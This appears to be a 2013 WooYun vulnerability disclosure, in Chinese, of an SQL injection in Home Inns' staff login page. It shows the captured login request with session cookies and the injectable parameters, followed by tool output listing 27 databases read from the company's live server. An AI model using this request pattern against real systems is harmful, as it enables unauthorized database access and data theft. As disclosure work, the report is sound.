当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043186

漏洞标题:如家SQL注入漏洞,涉及N多个库

相关厂商:如家酒店集团

漏洞作者: 小胖子

提交时间:2013-11-17 20:45

修复时间:2014-01-01 20:45

公开时间:2014-01-01 20:45

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-17: 细节已通知厂商并且等待厂商处理中
2013-11-17: 厂商已经确认,细节仅向厂商公开
2013-11-27: 细节向核心白帽子及相关领域专家公开
2013-12-07: 细节向普通白帽子公开
2013-12-17: 细节向实习白帽子公开
2014-01-01: 细节向公众公开

简要描述:

发现如家注册了...

详细说明:

漏洞地址:
office.homeinns.com
这个地址下涉及好多个系统!
office.homeinns.com/staffinfo/‎
office.homeinns.com/hcs/‎
等等...
注入点:
office.homeinns.com/staffinfo/login.aspx
登陆没有过滤,导致注射!
抓登陆包!

POST /staffinfo/login.aspx HTTP/1.1
Host: office.homeinns.com
Proxy-Connection: keep-alive
Content-Length: 203
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://office.homeinns.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.66 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://office.homeinns.com/staffinfo/login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=otxuq455k1anlkjcnfb3p245; NSC_WJQ_172.23.100.65=ffffffffaf1f7a5045525d5f4f58455e445a4a423660
__VIEWSTATE=%2FwEPDwUKMTk5MDQ2MDAwNmRkTaja6ST7t3GaH7rq30kvNrZxaGk%3D&__EVENTVALIDATION=%2FwEWBQKCmuahCQLT8dy8BQK1qbSRCwKM54rGBgK7q7GGCOJQVCNxCc3j8yhcNg%2FDVzetIsVA&txtUserID=1&txtPassword=1&Button1=Enter


果断是注入了~

SQL.jpg


读出来的数据!

current database:    'Staffinfo'


available databases [27]:
[*] [Smart eVision]
[*] [Smart eVision_2010_4_26_12_11_bak]
[*] [Smart eVision_2010_5_19_11_11_bak]
[*] App
[*] BBS
[*] HomeInnsDW
[*] HomeinnsSurvey
[*] ITOperationDB
[*] jbClub
[*] km
[*] Manage_Survey
[*] Manage_Survey_test
[*] ManageDB
[*] ManageDBTest
[*] master
[*] model
[*] msdb
[*] NCExport
[*] PraseDB
[*] PRM
[*] QC
[*] Rujia_equipment
[*] Staffinfo
[*] Staffinfo_Test
[*] tempdb
[*] Test
[*] UserInfoBus_Test


27个数据库,就不再列详细数据啦。

漏洞证明:

见详细说明。

修复方案:

0x1:登陆框过滤。
0x2:求20rank!

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-11-17 20:57

厂商回复:

感谢关注!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-17 20:59 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    @疯狗 @Finger 俺4个大河网的也给审下吧

  2. 2013-11-17 21:19 | cuger ( 普通白帽子 | Rank:200 漏洞数:44 | 这个家伙很懒,什么也没留下)

    唉。。。。好几个站都在210那个站点上,不知道和我发的那个注入一样否?

  3. 2013-11-17 21:25 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    mark

  4. 2013-11-17 23:28 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    目测这货最近要开房,这是要房卡来了

  5. 2013-11-19 22:17 | X防部 ( 普通白帽子 | Rank:487 漏洞数:137 )

    曹 @小胖子 你不是说换马甲报洞了吗??、、、、、

  6. 2013-11-19 22:32 | 天朝城管 ( 普通白帽子 | Rank:116 漏洞数:35 | 不要等到命玩你的时候才开始玩命)

    @小胖子 1222 二哥的rank真给力

  7. 2013-11-19 23:35 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @X防部 没忍住~马甲太多,不知道换哪个好了~

  8. 2013-12-07 11:05 | ohmygod ( 路人 | Rank:0 漏洞数:1 | sb)